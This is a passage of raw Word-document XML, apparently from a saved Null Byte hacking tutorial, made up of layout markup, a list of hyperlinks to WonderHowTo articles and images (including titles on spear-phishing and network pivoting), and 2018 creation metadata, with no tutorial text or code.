              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1891378422">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="686176123">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="577011225">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="893391181">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2021275907">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
              </w:divsChild>
            </w:div>
            <w:div w:id="360865518">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="8306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spear-phish-with-social-engineering-toolkit-set-backtrack-0148571/" TargetMode="Externa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mg.wonderhowto.com/img/original/13/63/63670623939324/0/636706239393241363.jpg" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/social-engineering/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/29/66/63669497318449/0/636694973184492966.jpg" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/81/69/63670621554089/0/636706215540898169.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ll-byte.wonderhowto.com/how-to/linux-basics/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://goo.gl/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-web-apps/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creator.wonderhowto.com/drd_/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-pivot-from-victim-system-own-every-computer-network-0149847/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/61/47/63670621497136/0/636706214971366147.jpg" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bitly.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dvwa.co.uk/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://img.wonderhowto.com/img/original/06/43/63670621522621/0/636706215226210643.jp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2018-09-27T19:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-27T19:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>